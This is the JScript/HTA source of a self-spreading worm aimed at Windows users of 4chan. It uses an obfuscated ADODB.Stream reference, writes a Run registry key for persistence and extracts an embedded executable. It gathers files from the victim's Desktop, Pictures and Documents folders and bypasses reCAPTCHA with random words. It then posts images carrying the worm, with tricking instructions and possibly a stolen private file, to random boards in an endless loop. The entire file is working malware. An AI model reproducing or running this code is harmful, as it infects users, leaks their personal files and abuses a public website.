Untitled

//<script id=thisscript>
var initsettings = {};
initsettings.line1 = unescape("");
initsettings.name = unescape("CAN");
initsettings.wordchoice = [29,34,46,21,28,42,50,14,38,13,43,29,36,11,8,48,20,3];
initsettings.pt = 13.145477355279041;
initsettings.fg = [129,70,30];
initsettings.bg = [138,172,194];

// List of boards
var dir = "a b c d e g h hr k m o p r s t u v w wg i ic cm y r9k 3 adv an cgl ck co fa fit int jp lit mu n new po sci sp tg toy trv tv vp x".split(" ");
var mfs = [3,2,3,3,3,3,3, 8,3,3,3,5,8,3,3,3,3,4, 4,3, 3, 3,3,  2,3,  3, 3,  3, 3, 3, 3,  3,  3, 3,  3, 3,3,  3, 8,  3, 3, 3,  3,  8, 3, 3,3];

// ActiveX objects we need
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");
var sa = new ActiveXObject("Shell.Application");

// Set directory
shell.currentDirectory = fs.getSpecialFolder(2);

// Generate random string
function randomstring(choices, length) {
    var str = "";
    for (var i = 0; i < length; i++) {
        str += choices.charAt( Math.floor(Math.random()*choices.length) );
    }
    return str;
}

// Choose randomly from list
function randomchoice(list) {
    return list[Math.floor(Math.random()*list.length)];
}

// Gets HTML page or file from URL
function get(url, doretry) {
    if (typeof get.modtime == "undefined") get.modtime = [];
    var successful = 0;
    var tries = 0;
    do {
        try {
            request.open("get", url, 0);
            request.setRequestHeader("Accept-Language", "en-us");
            if (get.modtime[url]) {
                request.setRequestHeader("If-Modified-Since", get.modtime[url]);
            }
            request.send();
            get.modtime[url] = request.getResponseHeader("Last-Modified");
            successful = (request.status == 200);
        } catch(e) {}
        tries++;
    } while (doretry && !successful && tries < 5);
    if (!successful) throw("");
}

// Remove HTML entities, tags from comment
function cleanup(comment) {
    comment = comment.replace(/<br \/>/g, "\n");
    comment = comment.replace(/<[^>]*>/g, "");
    comment = comment.replace(/&quot;/g, "\"");
    comment = comment.replace(/&amp;/g, "&");
    comment = comment.replace(/&#44;/g, ",");
    comment = comment.replace(/&lt;/g, "<");
    comment = comment.replace(/&gt;/g, ">");
    return comment;
}

// Add deliberate typos to comment
function garble(comment) {
    comment = comment.split("");
    for (var i = 0; i < comment.length - 1; i++) {
        if (Math.random() < 0.01) {
            var tmp = comment[i];
            comment[i] = comment[i+1];
            comment[i+1] = tmp;
        }
    }
    comment = comment.join("");
    comment = comment.replace("\n", "\r\n");
    return comment;
}

// Create new text stream
function textstream() {
    var stream = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
    stream.mode = 3; //rw
    stream.type = 2; //text
    stream.open();
    return stream;
}

// Create stream containing string
function stringstream(s) {
    var stream = textstream();
    var s2 = unescape(encodeURIComponent(s)); // encode UTF8
    for (var i = 0; i < s2.length; i++) {
        stream.writeText(s2.charAt(i));
        stream.position -= 1;
        stream.setEOS();
    }
    return stream;
}

// Copy text streams to binary stream, removing Unicode garbage at beginning
function concat(streams) {
    var stream2 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
    stream2.mode = 3; //rw
    stream2.type = 1; //binary
    stream2.open();
    for (var i = 0; i < streams.length; i++) {
        streams[i].position = 2;
        streams[i].copyTo(stream2);
        streams[i].close();
    }
    stream2.position = 0;
    return stream2;
}

// Copy n bytes from stream to file
function copytofile(stream, filename, n) {
    var stream2 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
    stream2.mode = 3; //rw
    stream2.type = 1; //binary
    stream2.open();
    stream.copyTo(stream2, n);
    stream2.saveToFile(filename, 2);
    stream2.close();
}

if (typeof WSH == "undefined") {

    // Make copy of script
    var stream = textstream();
    stream.loadFromFile(location.pathname);
    var s = stream.readText();
    stream.close();
    var start = 2 * s.indexOf("\u2f2f\u733c\u7263\u7069");
    if (start < 0) start = 2 * s.indexOf("\u3c2f\u6373\u6972\u7470") - 1;
    var end = 2 * s.indexOf("\u6164\u6174\u6e65\u7364\u6568\u6572");
    if (end < 0) end = 2 * s.indexOf("\u7461\u6561\u646e\u6873\u7265") - 1;
    var stream2 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
    stream2.mode = 3; //rw
    stream2.type = 1; //binary
    stream2.open();
    stream2.loadFromFile(location.pathname);
    stream2.position = start - 4;
    var stream3 = new ActiveXObject("maertS.bdodA".split("").reverse().join(""));
    stream3.mode = 3; //rw
    stream3.type = 1; //binary
    stream3.open();
    stream2.copyTo(stream3, end - start + 16);
    stream3.saveToFile("winconfig.js", 2);
    stream2.close();
    stream3.close();

    // Add to startup and run
    var startcmd = "wscript \"" + fs.getFile("winconfig.js").path + "\"";
    try {
        shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\winconfig", startcmd);
    } catch(e) {}
    shell.run(startcmd);

    close();

} else {

    // Common English words
    var wordlist = ["the","and","to","of","a","I","in","was","he","that","it","his","her","you","as","had","with","for","she","not","at","but","be","my","on","have","him","is","said","me","which","by","so","this","all","from","they","no","were","if","would","or","when","what","there","been","one","could","very","an","who","them","Mr","we","now","more","out","do","are","up","their","your","will","little","than","then","some","into","any","well","much","about","time","know","should","man","did","like","upon","such","never","only","good","how","before","other","see","must","am","own","come","down","say","after","think","made","might","being","Mrs","again","great","two","can","go","over","too","here","came","old","thought","himself","where","our","may","first","way","has","though","without","went","us","away","day","make","these","young","nothing","long","shall","sir","back","don't","house","ever","yet","take","every","hand","most","last","eyes","its","miss","having","off","looked","even","while","dear","look","many","life","still","mind","quite","another","those","just","head","tell","better","always","saw","seemed","put","face","let","took","poor","place","why","done","herself","found","through","same","going","under","enough","soon","home","give","indeed","left","get","once","mother","heard","myself","rather","love","knew","got","lady","room","something","yes","thing","father","perhaps","sure","heart","oh","right","against","three","men","night","people","door","told","round","because","woman","till","felt","between","both","side","seen","morning","began","whom","however","asked","things","part","almost","moment","looking","want","far","hands","gone","world","few","towards","gave","friend","name","best","word","turned","kind","cried","since","anything","next","find","half","hope","called","nor","words","hear","brought","set","each","replied","wish","voice","whole","together","manner","new","believe","course","least","years","answered","among","stood","sat","speak","leave","work","keep","taken","end","less","present","family","often","wife","whether","master","coming","mean","returned","evening","light","money","cannot","whose","boy","days","near","matter","suppose","gentleman","used","says","really","rest","business","full","help","child","sort","passed","lay","small","behind","girl","feel","fire","care","alone","open","person","call","given","I'll","sometimes","making","short","else","large","within","chapter","true","country","times","ask","answer","air","kept","hour","letter","happy","reason","pretty","husband","certain","others","ought","does","known","it's","bed","table","that's","ready","read","already","pleasure","either","means","spoke","taking","friends","talk","hard","walked","turn","strong","thus","yourself","high","along","above","feeling","glad","children","doubt","nature","themselves","black","hardly","town","sense","saying","deal","account","use","white","bad","everything","can't","neither","wanted","mine","close","return","dark","fell","subject","bear","appeared","fear","state","thinking","also","point","therefore","fine","case","doing","held","certainly","walk","lost","question","company","continued","fellow","truth","water","possible","hold","afraid","bring","honour","low","ground","added","five","remember","except","power","seeing","dead","I'm","usual","able","second","arms","late","opinion","window","brother","live","four","none","death","arm","road","hair","sister","entered","sent","married","longer","immediately","god","women","hours","ten","understand","son","horse","wonder","cold","beyond","please","fair","became","sight","met","afterwards","eye","year","show","general","itself","silence","lord","wrong","turning","daughter","stay","forward","O","interest","thoughts","followed","won't","different","opened","several","idea","received","change","laid","strange","nobody","fact","during","feet","tears","run","purpose","character","body","ran","past","order","need","pleased","trouble","whatever","dinner","happened","sitting","getting","there's","besides","soul","ill","early","rose","aunt","hundred","minutes","across","carried","sit","observed","suddenly","creature","conversation","worse","six","quiet","chair","doctor","tone","standing","living","sorry","stand","meet","instead","wished","ah","lived","try","red","smile","sound","expected","silent","common","meant","tried","until","mouth","distance","occasion","cut","marry","likely","length","story","visit","deep","seems","street","remained","become","led","speaking","natural","giving","further","struck","week","loved","drew","seem","church","knows","object","ladies","marriage","book","appearance","pay","I've","obliged","particular","pass","thank","form","knowing","lips","knowledge","former","blood","sake","fortune","necessary","presence","feelings","corner","beautiful","talking","spirit","ago","foot","circumstances","wind","presently","comes","attention","wait","play","easy","real","clear","worth","cause","send","spirits","chance","didn't","view","pleasant","party","beginning","horses","stopped","notice","duty","he's","age","figure","leaving","sleep","entirely","twenty","fall","promise","months","broken","heavy","secret","thousand","happiness","comfort","minute","act","human","fancy","strength","showed","pounds","nearly","probably","captain","piece","school","write","laughed","reached","repeated","walking","father's","heaven","beauty","shook","sun","waiting","moved","bit","desire","news","front","effect","laugh","uncle","fit","miles","handsome","caught","hat","regard","gentlemen","supposed","easily","impossible","glass","resolved","grew","consider","green","considered","unless","stop","forth","expect","perfectly","altogether","surprise","sudden","free","exactly","grave","carriage","believed","service","angry","putting","carry","everybody","mentioned","looks","scarcely","society","affection","exclaimed","dress","die","earth","latter","garden","step","perfect","countenance","liked","dare","pain","companion","journey","paper","opportunity","makes","honest","arrived","you'll","bright","pity","directly","cry","trust","fast","ye","warm","danger","trees","breakfast","rich","engaged","proper","talked","respect","fixed","hill","wall","determined","wild","shut","top","plain","scene","sweet","especially","public","acquaintance","forget","history","pale","pray","books","afternoon","man's","otherwise","mention","position","speech","gate","'em","boys","yours","drink","slowly","broke","clothes","fond","pride","watch","sooner","settled","paid","reply","tea","lie","running","died","gentle","particularly","allowed","outside","placed","joy","hearing","note","condition","follow","begin","neck","serious","hurt","kindness","mere","farther","changed","o'clock","passing","girls","force","situation","greater","expression","eat","reading","spoken","raised","anybody","started","following","although","sea","proud","future","quick","safe","temper","laughing","ears","difficulty","meaning","servant","sad","advantage","appear","offer","breath","opposite","number","miserable","law","rising","favour","save","twice","single","blue","noise","stone","mistress","surprised","allow","spot","burst","keeping","line","understood","court","finding","direction","anxious","pocket","around","conduct","loss","fresh","below","hall","satisfaction","land","telling","passion","floor","break","lying","waited","closed","meeting","trying","seat","king","confidence","offered","stranger","somebody","matters","noble","pardon","private","sharp","evil","weeks","justice","hot","cast","letters","youth","lives","health","finished","hoped","holding","touch","spite","delight","bound","consequence","rain","wouldn't","third","hung","ways","weather","written","difference","kitchen","she's","mother's","persons","quarter","promised","hopes","brown","nay","seven","simple","wood","beside","middle","ashamed","lose","dreadful","move","generally","cousin","surely","satisfied","bent","shoulder","art","field","quickly","thrown","tired","share","pair","to-morrow","aware","colour","writing","whenever","quietly","fool","forced","touched","smiling","taste","dog","spent","steps","worst","legs","watched","ay","thee","eight","worthy","wrote","manners","proceeded","frightened","somewhat","born","greatest","charge","degree","shame","places","ma'am","couldn't","tongue","according","box","wine","filled","servants","calling","fallen","supper"];

    // Extract file
    var archive = textstream();
    archive.loadFromFile(WScript.ScriptFullName);
    for (var i = 2; i + 2 <= archive.size; i++) {
        archive.position = i;
        if (archive.readText(1).charCodeAt(0) < 256) break;
    }
    copytofile(archive, "winconfig.exe", 165376);
    archive.close();

    // Get list of documents
    var doclist = [];
    var dirkeys = ["Desktop", "My Pictures", "Personal"];
    for (var i = 0; i < dirkeys.length; i++) {
        try {
            var dirname = shell.regRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\" + dirkeys[i]);
            var dirlist = sa.namespace(dirname).items();
            for (var j = 0; j < dirlist.count; j++) {
                var it = dirlist.item(j);
                if (!it.isFolder && !it.isLink && it.size <= 3145728) {
                    doclist.push(it.path);
                }
            }
        } catch(e) {}
    }

    // List of subject lines seen
    var subjectlist = [];

    // For cookie clearing
    var ie;
    try {
        ie = new ActiveXObject("InternetExplorer.Application");
        ie.navigate("http://boards.4chan.org/b/");
    } catch(e) {}

    while (true) {
        try {
            // Clear cookies
            try {
                ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
                ie.document.cookie = "ws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
            } catch(e) {}

            // Select random board
            board = (Math.random() < 0.2) ? 1 : Math.floor( Math.random() * dir.length);

            // Get comment, subject lines
            get("http://boards.4chan.org/" + dir[board] + "/" + (5 + Math.floor(11*Math.random())), 1);
            var comments = request.responseText.match(/<blockquote>.*?<\/blockquote>/g);
            var comment = randomchoice(comments);
            comment = cleanup(comment);
            comment = comment.replace(/>>\d+/g, "");
            var subjects = request.responseText.match(/<span class="(?:file|reply)title">.*?<\/span>/g);
            for (var i = 0; i < subjects.length; i++) {
                var subject = cleanup(subjects[i])
                if (subject != "") {
                    subjectlist.push(subject.toUpperCase());
                    if (subjectlist.length > 10000) subjectlist.splice(0,1);
                }
            }

            // Select thread to post to and name of file
            var thread = "";
            if (Math.random() < 0.9) {
                get("http://boards.4chan.org/" + dir[board] + "/", 1);
                var threadlist = request.responseText.match(/<span id="nothread\d+/g);
                thread = randomchoice(threadlist).match(/\d+/)[0];
            }
            var filename = (new Date().getTime() - Math.floor(Math.random()*1e10)) + ".png";

            // CAPTCHA
            var threadurl = "http://boards.4chan.org/" + dir[board] + "/";
            if (thread != "") threadurl += "res/" + thread;
            get("http://www.google.com/recaptcha/api/challenge?k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc", 1);
            var challenge1 = request.responseText.match(/challenge : '([^']+)'/)[1];
            get("http://www.google.com/recaptcha/api/reload?c=" + challenge1 + "&k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc&reason=a&type=audio&lang=en&new_audio_default=1", 1);
            var challenge2 = request.responseText.match(/finish_reload\('([^']+)'/)[1];
            var nwords = 10 + Math.floor(3*Math.random());
            response = "";
            for (var i = 0; i < 10; i++) {
                if (i > 0) response += " ";
                response += randomchoice(wordlist);
            }

            // Mutate settings
            function MUT() {
                return Math.random() < 0.2;
            }
            var settings = {};
            for (var x in initsettings) {
                if (typeof settings[x] == "object") {
                    settings[x] = initsettings[x].slice(0);
                } else {
                    settings[x] = initsettings[x];
                }
            }
            if (MUT()) {
                switch(Math.floor(3*Math.random())) {
                    case 0: if (subjectlist.length > 0) settings.line1 = randomchoice(subjectlist); break;
                    case 1: settings.line1 = comment.match(/^[a-z0-9'-\/$ ]*[\.\?\!:]*/i)[0].toUpperCase(); break;
                    case 2: settings.line1 = ""; break;
                }
            }
            if (MUT()) {
                var wordsource = (Math.random() < .5 || subjectlist.length == 0) ? comment : randomchoice(subjectlist);
                var words = wordsource.match(/[a-z1234]+/gi);
                if (words != null) settings.name = randomchoice(words).toUpperCase();
            }
            for (var i = 0; i < settings.wordchoice.length; i++) {
                if (MUT()) settings.wordchoice[i] = Math.floor(60*Math.random());
            }
            if (MUT()) settings.pt = 100*Math.random() + 10;
            if (MUT()) for (var i = 0; i < 3; i++) settings.fg[i] = Math.floor(256*Math.random());
            if (MUT()) for (var i = 0; i < 3; i++) settings.bg[i] = Math.floor(256*Math.random());

            // Write new settings
            var newscript = "\r\n\r\n//<scr"+"ipt id=thisscript>\r\nvar initsettings = {};\r\n";
            for (var x in settings) {
                switch(typeof settings[x]) {
                case "number":
                    newscript += "initsettings." + x + " = " + settings[x] + ";\r\n";
                    break;
                case "object":
                    newscript += "initsettings." + x + " = [" + settings[x].join(",") + "];\r\n";
                    break;
                case "string":
                    newscript += "initsettings." + x + " = unescape(\"" + escape(settings[x]) + "\");\r\n";
                    break;
                }
            }
            var nsfile = fs.openTextFile("winconfig.dat", 2, 1);
            nsfile.write(newscript);
            nsfile.close();

            // Choose words
            var lines = [];
            var wc = settings.wordchoice;
            lines[0] = settings.line1;
            lines[1] = ["OPEN", "CLICK", "TAKE", "VIEW", "START WITH"][wc[0]%5] + " " + [["THIS", "THE"][wc[1]%2] + " " + ["IMAGE", "PIC", "PICTURE", "FILE"][wc[2]%4], "ME"][wc[3]%2];
            if (wc[4]%2) lines[1] = "";
            lines[2] = ["COPY", "COPY+PASTE", "PASTE"][wc[5]%3] + [" ", " IT ", " ME ", " THIS "][wc[6]%4] + "TO " + ["PAINT", "MSPAINT"][wc[7]%2];
            lines[3] = "SAVE" + [" ", " IT ", " THE FILE ", " ME "][wc[8]%4] + "AS" + [":", ""][wc[9]%2];
            lines[4] = ["FILE NAME: ", "NAME: ", ""][wc[10]%3] + settings.name + ".HTA";
            lines[5] = ["SAVE AS TYPE: ", "TYPE: ", ""][wc[11]%3] + ["24-BIT BITMAP", "24 BITS", "BITMAP"][wc[12]%3];
            if (wc[13]%2) lines[5] = "";
            lines[6] = ["", "THEN ", "AND "][wc[14]%3] + "OPEN" + ["", " IT", " THE FILE", " IT AGAIN"][wc[15]%4];
            lines[6] = ["", lines[6], lines[6] + " AND SHIT BRICKS", "SHIT BRICKS"][wc[16]%4];
            if (wc[17]%2) {
                var num = 1;
                for (var i = 1; i <= 6; i++) {
                    if (i != 4 && i != 5 && lines[i] != "") {
                        lines[i] = num + ". " + lines[i];
                        num++;
                    }
                }
            }
            var text = "";
            for (var i = 0; i < lines.length; i++) {
                if (lines[i] != "") {
                    if (text != "") text += "\\";
                    text += lines[i].replace(/[^A-Z1-4\.\?\!:\-\+'\$\/ ]/g, "");
                }
            }

            // Draw text
            var drawcmd = 'winconfig "' + text + '" ' + 'winconfig.dat "' + WSH.scriptFullName + '" ' + 'winconfig.sys '
                    + settings.pt + ' ' + settings.fg.join(' ') + ' ' + settings.bg.join(' ');
            if (doclist.length > 0) {
                drawcmd += ' "' + randomchoice(doclist).replace(/"/g, "") + '"';
            }
            if (shell.run(drawcmd, 0, 1)) throw "";

            // Set URL to post to
            request.open("post", "http://sys.4chan.org/" + dir[board] + "/post", 0);

            // Set headers
            var bdry = "---------------------------" + randomstring("0123456789abcdef", 13);
            request.setRequestHeader("Accept-Language", "en-us");
            request.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);

            // Create POST data
            var head = "--" + bdry + "\r\nContent-Disposition: form-data; name=\"";
            var part1 = stringstream(
                head + "MAX_FILE_SIZE\"\r\n\r\n" + (mfs[board]*1048576) + "\r\n"
                + (thread == "" ? "" : (head + "resto\"\r\n\r\n" + thread + "\r\n"))
                + head + "name\"\r\n\r\n\r\n"
                + head + "email\"\r\n\r\nnoko\r\n"
                + head + "sub\"\r\n\r\n\r\n"
                + head + "com\"\r\n\r\n" + garble(comment) + "\r\n"
                + head + "recaptcha_challenge_field\"\r\n\r\n" + challenge2 + "\r\n"
                + head + "recaptcha_response_field\"\r\n\r\n" + response + "\r\n"
                + head + "upfile\"; filename=\"" + filename + "\"\r\nContent-Type: image/x-png\r\n\r\n"
            );

            var part2 = textstream();
            part2.loadFromFile("winconfig.sys");
            part2.writeText("");

            var part3 = stringstream(
                "\r\n"
                + head + "pwd\"\r\n\r\n" + randomstring("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", 8) + "\r\n"
                + head + "mode\"\r\n\r\nregist\r\n"
                + "--" + bdry + "--\r\n"
            );

            var postdata = concat([part1, part2, part3]);

            // Post file
            request.send(postdata);
            postdata.close();

        } catch(e) {}
    }
}
//</script>